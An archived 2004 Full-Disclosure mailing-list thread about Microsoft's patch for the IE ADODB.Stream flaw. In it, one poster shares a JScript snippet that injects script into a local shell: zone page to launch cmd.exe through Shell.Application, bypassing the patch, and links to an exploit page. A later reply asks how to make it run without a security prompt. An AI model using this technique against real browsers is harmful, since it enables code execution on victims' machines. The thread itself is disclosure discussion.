Full Disclosure mailing list archives

RE: Betr.: Re: Fix for IE ADODB.Stream vulnerability is out

From: "Mr. John" <johnspood () yahoo com>
Date: Sat, 3 Jul 2004 02:50:07 -0700 (PDT)

It is OK, but it causes security alert on some
machines because of "unsafe component". It isn't good
for us. But it is interesting that only on some
machines, this security alert prompted, on most winXP,
cmd.exe will run without any prompt.
What is your idea?


--- Jelmer <jkuperus () planet nl> wrote:

Because we avoid the adodb.stream issue all
together,
You can patch it, but if you leave open other
issues, well it's pointless
Instead we just swap in this instead of the old
shellcode:


-- snip --

function injectIt() {

document.frames[0].document.body.insertAdjacentHTML('afterBegin','injected<s

cript language="JScript" DEFER>var obj=new

ActiveXObject("Shell.Application");obj.ShellExecute("cmd.exe","/c

pause");</script>');
}
document.write('<iframe
src="shell:WINDOWS\\Web\\TIP.HTM"></iframe>');
setTimeout("injectIt()", 1000);

--snip--


And it's working again, how long did it take? What
like an hour since
Microsoft's announcement ?




-----Original Message-----
From: Pascal Zoutendijk
[mailto:Pascal.Zoutendijk () tbwa nl] 
Sent: vrijdag 2 juli 2004 23:28
To: hescominsoon () emmanuelcomputerconsulting com;
jkuperus () planet nl
Cc: helmut_hauser () hotmail com;
full-disclosure () lists netsys com
Subject: Betr.: Re: [Full-disclosure] Fix for IE
ADODB.Stream vulnerability
is out

what you should be getting (assuming the patch does
work) is something like
the
following:

line: 3
char: 3
Error: Access is denied
Code: 0

etc...

dunno why it doesn't work on some systems though.

Met vriendelijke groet,

Pascal Zoutendijk
TBWA \ ICT Services
Prof W.H. Keesomlaan 8
1183 DJ  Amstelveen, the Netherlands
Tel: +31205715300
Fax:+31205715639

William Warren

<hescominsoon () emmanuelcomputerconsulting com>
02-07-04
22:24

i have a athlon xp 2000+ not a slow system.  I am
running ie6 sp1 
all patched up..for this test..my mzin browser is
mozilla 
obviously mozilla is immune to this one..:)

Jelmer wrote:

That depends, are you using firefox? ;)

It works on my ie6 sp1 + latest and greatest

*cough* patches

It does however use settimeout, maybe you have a

low end system, and you

need a longer wait, just try reloading it a couple

of times



-----Original Message-----
From: full-disclosure-admin () lists netsys com
[mailto:full-disclosure-admin () lists netsys com] On

Behalf Of William
Warren

Sent: vrijdag 2 juli 2004 20:47
To: Jelmer
Cc: 'Helmut Hauser';

full-disclosure () lists netsys com

Subject: Re: [Full-disclosure] Fix for IE

ADODB.Stream vulnerability is
out


this returns an error..is that all it is supposed

to do?



Jelmer wrote:

Too bad it won't do you one ounce any good

http://62.131.86.111/security/idiots/malware2k/installer.htm


Credit: http-equiv




-----Original Message-----
From: full-disclosure-admin () lists netsys com
[mailto:full-disclosure-admin () lists netsys com] On

Behalf Of Helmut Hauser

Sent: vrijdag 2 juli 2004 18:39
To: full-disclosure () lists netsys com
Subject: [Full-disclosure] Fix for IE ADODB.Stream

vulnerability is out

http://www.microsoft.com/downloads/details.aspx?displaylang=en&FamilyID=4d05

6748-c538-46f6-b7c8-2fbfd0d237e3

Better late than never ...

Helmut Hauser

_______________________________________________
Full-Disclosure - We believe in it.
Charter:

http://lists.netsys.com/full-disclosure-charter.html



_______________________________________________
Full-Disclosure - We believe in it.
Charter:

http://lists.netsys.com/full-disclosure-charter.html


-- 
My "Foundation" verse:
Isa 54:17  No weapon that is formed against thee
shall prosper; 
and every tongue that shall rise against thee in
judgment thou 
shalt condemn. This is the heritage of the servants
of the LORD, 
and their righteousness is of me, saith the LORD.

-- carpe ductum -- "Grab the tape"

_______________________________________________
Full-Disclosure - We believe in it.
Charter:
http://lists.netsys.com/full-disclosure-charter.html

_____________________________________________________________________

This message has been checked for all known viruses.

_____________________________________________________________________

This message has been checked for all known viruses.


_______________________________________________
Full-Disclosure - We believe in it.
Charter:
http://lists.netsys.com/full-disclosure-charter.html




        
                
__________________________________
Do you Yahoo!?
New and Improved Yahoo! Mail - 100MB free storage!
http://promotions.yahoo.com/new_mail 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

RE: Betr.: Re: Fix for IE ADODB.Stream vulnerability is out Jelmer (Jul 02)
- Re: Betr.: Re: Fix for IE ADODB.Stream vulnerability is out Matthew Murphy (Jul 02)
  - Re: Betr.: Re: Fix for IE ADODB.Stream vulnerability is out Nick FitzGerald (Jul 02)
- RE: Betr.: Re: Fix for IE ADODB.Stream vulnerability is out Mr. John (Jul 03)
- <Possible follow-ups>
- Betr.: Re: Fix for IE ADODB.Stream vulnerability is out Pascal Zoutendijk (Jul 02)